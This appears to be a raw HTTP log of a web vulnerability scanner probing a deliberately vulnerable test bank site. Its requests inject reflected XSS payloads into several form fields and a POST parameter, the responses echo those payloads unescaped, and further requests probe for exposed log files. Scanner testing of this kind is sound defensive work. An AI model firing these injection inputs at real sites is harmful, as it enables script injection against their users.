Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /pindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:17 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 1771 Content-Type: text/html Cache-control: private <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY> <!-- Hidden Reference comment: should find this file /test/hidden.txt --> <P> The first section shows how a combo box can be used to product optional pages<BR></P> <FORM ACTION="pcomboindex.asp" METHOD="post"> <SELECT NAME="cboPage"> <OPTION SELECTED="SELECTED" VALUE="pc1">Show Page One</OPTION> <OPTION VALUE="pc2">Show Page Two</OPTION> <OPTION VALUE="pc3">Show page three</OPTION> </SELECT><BR> <INPUT TYPE="submit" VALUE="Submit"> </FORM><BR> <HR> <P><A HREF="plink.asp?a=b&c=12">Second section is link that passes parameters to a sub page</A><BR> <BR> <A HREF="error.html">My ERROR</A> Third example allows the user to input values and then shows them on the following page</P> <BR> <HR> <P>False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <BR> False Keyword that should not be flagged: An error has occurred <BR> <BR> <BR> <A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by SmartChecker</A> <BR> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit - Should not be flagged due to not having keyword present</A> <BR> <A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by Smartchecker(Note: No HTML present)</A> <BR> <A HREF="/linking/index.htm">Several chained directories</A> <BR> <A HREF="/cfmerror.html">Cold Fusion Error</A> <BR> <A HREF="/admin/help.cgi">Help</A> <BR> <A HREF="/aspnet.aspx">ASP.NET file</A> </P> <A HREF="sldjfsld;jsdl;kjfsdl;fj">Invalid link</A> <a href="/cookietest/">A cookie test page</a><br> <A HREF="http://www.spidynamics.com:34/login.asp">Timeout Link</A> <A HREF="/auth/">Protected Page</A> </BODY> </HTML>
GET /join.asp?name=>"'><img%20src="javascript:alert('XSS')">&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:35 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4013 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" 
bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=>"><script>alert('XSS')</script>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:28 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD 
bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /W3SVC1/ex001102.log HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:42:55 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:18 GMT ETag: "d828b92aadc11:8f6" Content-Length: 19 LOGIC CHECK SUCCESS
GET /W3SVC6/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:26:12 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /errors/errors.log HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:42:24 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:16 GMT ETag: "1ebfab1aadc11:8f6" Content-Length: 8277 <TITLE>LSWEB General Access Error Log</TITLE>Today is: 02-21-2001.<br>You are connecting from 65.80.48.114<br>Using Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)<p>You can use the following to debug your CGI scripts<BR>Reload to update<HR>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=>"'><img%20src="javascript:alert('XSS')">&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:39 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4013 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD 
bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 11 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect cboPage=pc3
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:21 GMT X-Powered-By: ASP.NET Location: p3.asp Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /join.asp?name=&email=&surname=&house=&street=&address2=>"'><img%20src="javascript:alert('XSS')">&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:36 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4013 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD 
bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /include/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:25:10 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 48 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect cboPage=</textarea><script>alert('XSS')</script>
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:38:18 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 975 Content-Type: text/html Cache-control: private <html> <body> A user should never see this text<br> this page is a redirect only page. The page that the user selected was </textarea><script>alert('XSS')</script><br> Page was looking for a value in parameter called cboPage<br><br> <h2>What follows is a dump of the HTTP stuff</h2> <b>Form Variables Passed:</b><br>cboPage= </textarea><script>alert('XSS')</script><br> <b>QueryString variables passed:</b><br><pre>****** Head Data*** Client IP:199.72.29.34 Connection: Close Host: zero.webappsecurity.com Referer: http://zero.webappsecurity.com:80/pindex.asp User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect Content-Length: 48 Content-Type: application/x-www-form-urlencoded ****** End of Head Data*******</pre><br> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:49 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 3974 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> 